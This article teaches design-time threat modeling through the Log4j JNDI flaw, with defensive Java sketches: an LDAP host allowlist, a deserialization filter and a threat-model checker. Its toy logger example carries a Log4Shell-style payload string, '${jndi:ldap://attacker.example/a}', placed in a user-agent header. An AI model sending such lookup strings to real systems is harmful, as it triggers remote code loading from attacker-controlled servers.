Threat modeling as a way of thinking about design flaws - Log4j case

What is this article about?

Many development, security, and operations teams have spent the past few months fighting one of the most serious security threats since the Shellshock vulnerability was discovered in 2014. Thanks to the hard work of the Log4j maintainers, who worked tirelessly and for free on mitigation measures, fixed versions of the popular Java library were released only a few days after the Alibaba Cloud Security Team reported the security flaw.

Much has been written about how to defend your organization against this specific flaw. Examples include the CISA Apache Log4j Vulnerability Guidance and Microsoft’s Guidance for preventing, detecting, and hunting for exploitation of the Log4j2 vulnerability, to mention just two. In this article we’d like to explore some lessons learned about how we can all improve collaboration in our SDLC workflows, so that similar flaws are caught at design time in the future.

Not all security defects are created the same way

Software security defects can be classified into two broad categories: bugs in the implementation and flaws in the design. As Gary McGraw explains in Software Security: Building Security In, architectural or design flaws are harder to change or fix, and they take training and help to understand, whereas coding or implementation bugs are easier to spot using scanning tools and reviews. That gap is why the IEEE Computer Society formed the Center for Secure Design (CSD) in 2014. The first document created by the center, Avoiding the Top 10 Software Security Design Flaws, was intended to shift some of the industry’s focus toward design flaws, which account for roughly 50 percent of security problems.

Last year, this focus on identifying common design flaws reached the well-known OWASP Top 10, whose 2021 edition introduced the new Insecure Design category:

There is a difference between insecure design and insecure implementation. We differentiate between design flaws and implementation defects for a reason, they have different root causes and remediation. A secure design can still have implementation defects leading to vulnerabilities that may be exploited. An insecure design cannot be fixed by a perfect implementation as by definition, needed security controls were never created to defend against specific attacks. 

Using threat modeling to think about security

The Threat Modeling Manifesto defines threat modeling as ‘analyzing representations of a system to highlight security and privacy characteristics’. It doesn’t have to be a complex process and could be adapted to modern software workflows. Adam Shostack's 4 Question Frame for Threat Modeling summarizes the process in just four steps:

  1. What are we working on?
  2. What could go wrong?
  3. What are we going to do about it?
  4. Did we do a good job?

In the following sections, we’ll use these four questions to guide a threat modeling exercise based on the Log4j case.

Step 1. What are we working on?

Following the first step in Adam Shostack’s framework, we can start by taking a trip back in time to 2013. That year, a feature request was submitted to the Log4j maintainers to add support for JNDI lookups.

[#LOG4J2-313] JNDI Lookup plugin support - ASF JIRA

Taking a look at the JIRA ticket description, we can start our threat modeling exercise by drawing a simplified diagram of the software architecture for this new feature.

Step 2. What could go wrong?

Once we have a basic view of the main components involved in the requested feature, we can start digging into the second step of the threat modeling process (“What could go wrong?”) with some “what if” questions:

  • What if the log messages include JNDI lookups?
  • What if we use JNDI to connect to an external LDAP server?
  • What if the LDAP server is controlled by a third party?
  • What if the LDAP server responds with directory information pointing to another external service under an attacker’s control?
  • What if JNDI can be used to cause remote code execution via deserialization?

Questions like these could have led us to think about threats, and eventually to draw more detailed diagrams illustrating abuse cases that weren’t straightforward at the beginning of the discussion.

If somebody could control the JNDI lookups, we could end up with a remote code execution vulnerability via deserialization. In this abuse case, Log4j acts as a “wrapper” that lets an attacker execute arbitrary JNDI lookups, which could end up loading and executing malicious serialized classes from external servers.
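
The abuse case can be illustrated with a toy model. What follows is a minimal sketch in Java, not Log4j’s actual code: the class LookupAbuseSketch, its ${prefix:key} pattern, and the host attacker.example are assumptions made for illustration, and the “jndi” resolver only records the URL it was asked to contact instead of opening a network connection.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.function.Function;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Toy model of a logger that expands ${prefix:key} expressions. Not Log4j code. */
class LookupAbuseSketch {

    // Matches expressions such as ${env:HOME} or ${jndi:ldap://host/a}.
    private static final Pattern LOOKUP = Pattern.compile("\\$\\{(\\w+):([^}]*)\\}");

    private final Map<String, Function<String, String>> resolvers = new HashMap<>();
    private final boolean expandMessageText;

    LookupAbuseSketch(boolean expandMessageText) {
        this.expandMessageText = expandMessageText;
    }

    void register(String prefix, Function<String, String> resolver) {
        resolvers.put(prefix, resolver);
    }

    /** Returns the line that would be written to the log. */
    String format(String message) {
        if (!expandMessageText) {
            return message; // message text is treated as plain data
        }
        Matcher m = LOOKUP.matcher(message);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            Function<String, String> resolver = resolvers.get(m.group(1));
            // Unknown prefixes are left untouched; known ones are resolved.
            String value = resolver == null ? m.group() : resolver.apply(m.group(2));
            m.appendReplacement(out, Matcher.quoteReplacement(value));
        }
        m.appendTail(out);
        return out.toString();
    }

    /** Logs one attacker-influenced message and returns the URLs the resolver was asked to contact. */
    static List<String> demo(boolean expandMessageText) {
        List<String> contacted = new ArrayList<>();
        LookupAbuseSketch logger = new LookupAbuseSketch(expandMessageText);
        // Stand-in for a JNDI lookup: it records the URL instead of connecting.
        logger.register("jndi", url -> {
            contacted.add(url);
            return "<remote object>";
        });
        String userAgent = "${jndi:ldap://attacker.example/a}"; // attacker-controlled header
        logger.format("Request from user agent: " + userAgent);
        return contacted;
    }

    public static void main(String[] args) {
        System.out.println("expansion on:  " + demo(true));
        System.out.println("expansion off: " + demo(false));
    }
}
```

With expansion enabled, the recorded list contains the attacker-supplied URL. With expansion disabled it stays empty, because the message text is never interpreted.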

Step 3. What are we going to do about it?

These are some of the potential actions that may have arisen from the threat modeling exercise:

  • In most cases, developers expect to log plain text messages, without any additional magic under the hood. If we want to support extra use cases that help some power users (like JNDI lookups), it’s better to add them as optional features that are disabled in the default configuration.
  • In simple terms, your attack surface is the set of all access points that an attacker could use to compromise your application. Ideally, every security-relevant decision that affects the application’s attack surface should be stated explicitly in the Log4j API documentation. That way, any developer who uses this software component is in a better position to make an informed decision about the trade-off between functionality and risk.
  • Finally, if you, as a developer, decide to enable JNDI lookup support for your application logs while aware of the potential risks, remember to enforce data validation. This could mean creating an allowlist of the LDAP servers that may be used in a JNDI lookup, and a global deserialization filter that explicitly validates which remote Java classes may be deserialized in your application. “Applications should not perform JNDI lookups with untrusted data”: this advice was given back in 2016, in the Black Hat presentation “A Journey from JNDI/LDAP Manipulation to Remote Code Execution Dream Land” by Alvaro Muñoz and Oleksandr Mirosh.
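
The data validation described in the last point could look roughly like the sketch below. It is an illustration under stated assumptions, not a vetted hardening recipe: the class name JndiHardeningSketch, the host ldap.internal.example, and the filter pattern are hypothetical. ObjectInputFilter is the standard JDK deserialization filter API (Java 9 and later), and a filter like this only covers the deserialization path.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.net.URI;
import java.util.Date;
import java.util.HashMap;
import java.util.Locale;
import java.util.Set;

class JndiHardeningSketch {

    // Hypothetical allowlist; real host names would come from configuration.
    private static final Set<String> ALLOWED_LDAP_HOSTS = Set.of("ldap.internal.example");

    // Illustrative pattern: allow java.util.Date, reject every other class.
    // The same filter could be installed process-wide with
    // ObjectInputFilter.Config.setSerialFilter(FILTER).
    static final ObjectInputFilter FILTER =
            ObjectInputFilter.Config.createFilter("java.util.Date;!*");

    /** Accepts only ldap/ldaps URLs whose host is on the allowlist. */
    static boolean isAllowedLookup(String url) {
        try {
            URI uri = URI.create(url);
            String scheme = uri.getScheme();
            String host = uri.getHost();
            return scheme != null && host != null
                    && (scheme.equalsIgnoreCase("ldap") || scheme.equalsIgnoreCase("ldaps"))
                    && ALLOWED_LDAP_HOSTS.contains(host.toLowerCase(Locale.ROOT));
        } catch (IllegalArgumentException e) {
            return false; // malformed input is rejected, not repaired
        }
    }

    static byte[] serialize(Object value) throws IOException {
        ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buffer)) {
            out.writeObject(value);
        }
        return buffer.toByteArray();
    }

    /** Deserializes with the filter applied to this stream only. */
    static Object readFiltered(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            in.setObjectInputFilter(FILTER);
            return in.readObject();
        }
    }

    /** Round-trips a value and reports whether the filter rejected its class. */
    static boolean isRejected(Object value) {
        try {
            readFiltered(serialize(value));
            return false;
        } catch (InvalidClassException e) {
            return true; // thrown when the filter returns REJECTED
        } catch (IOException | ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(isAllowedLookup("ldap://ldap.internal.example/config"));
        System.out.println(isAllowedLookup("ldap://attacker.example/a"));
        System.out.println(isRejected(new Date(0L)));
        System.out.println(isRejected(new HashMap<String, String>()));
    }
}
```

The design choice in both checks is to reject by default: a lookup target or a class is accepted only if it was listed explicitly, which mirrors the first point about keeping risky features opt-in.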

Step 4. Did we do a good job?

In this last step (as in any Agile retrospective), we should focus on continuous learning and improvement. While threat modeling is not a simple task, the alternative is being reactive and fighting in the dark without a map. Some self-assessment questions that could help at this stage are:

  • Regarding the diagram: did we miss any important components? Are trust boundaries well defined?
  • Did we find at least one threat per component in the diagram?
  • Did we find one countermeasure per identified threat?
  • Did we act on the countermeasures we found?
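
Some of these questions can be checked mechanically if the threat model is kept as data. The following is a minimal sketch under that assumption: the class ThreatModelReviewSketch, the Threat type, and the example components are all hypothetical and do not come from any particular threat modeling tool.

```java
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

class ThreatModelReviewSketch {

    /** A threat and the countermeasures recorded for it (hypothetical model). */
    static final class Threat {
        final String description;
        final List<String> countermeasures;

        Threat(String description, List<String> countermeasures) {
            this.description = description;
            this.countermeasures = countermeasures;
        }
    }

    /** Lists components without any threat and threats without any countermeasure. */
    static List<String> review(Map<String, List<Threat>> threatsByComponent) {
        List<String> findings = new ArrayList<>();
        for (Map.Entry<String, List<Threat>> entry : threatsByComponent.entrySet()) {
            if (entry.getValue().isEmpty()) {
                findings.add("No threat identified for component: " + entry.getKey());
            }
            for (Threat threat : entry.getValue()) {
                if (threat.countermeasures.isEmpty()) {
                    findings.add("No countermeasure for threat: " + threat.description);
                }
            }
        }
        return findings;
    }

    /** Illustrative model loosely based on the components discussed in this article. */
    static Map<String, List<Threat>> exampleModel() {
        Map<String, List<Threat>> model = new LinkedHashMap<>();
        model.put("Application log call", List.of(
                new Threat("Attacker-controlled text reaches the logger",
                        List.of("Treat message text as data"))));
        model.put("JNDI lookup", List.of(
                new Threat("Lookup resolves against an attacker-controlled LDAP server",
                        List.of())));
        model.put("External LDAP server", List.of());
        return model;
    }

    public static void main(String[] args) {
        review(exampleModel()).forEach(System.out::println);
    }
}
```

A check like this cannot tell whether the diagram is complete or whether a countermeasure was actually implemented. It only flags the gaps that are visible in the recorded model, so the first and last questions still need a conversation within the team.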

It’s easy (and also really unfair) to blame the Log4j maintainers for not having spotted the security implications of enabling JNDI support in the default configuration. However, as Alvaro Muñoz also stated, we (as a security community) share responsibility for not having recognized the huge impact of this threat sooner.

Modern software development is a very complex process and we should rethink how we build security into the design of our systems. As Ken Pentimonti of Paladin Capital Group argues,

“Businesses and governments need to assume that no system or piece of software is safe and they need to invest in and adapt new and incremental technologies, such as automated threat modeling solutions, that can identify devastating security flaws before the flaw is exploited and becomes a business or national security threat.” 

The disconnect between security and development teams made it possible for this particular vulnerability to stay hidden for more than eight years. Threat modeling is a team activity that could help build better collaboration between those teams. It could be a way to start security conversations about the impact of the myriad changes that go into today’s applications. We should remember that the main problem is not an incomplete threat model. The main risk is not threat modeling at all.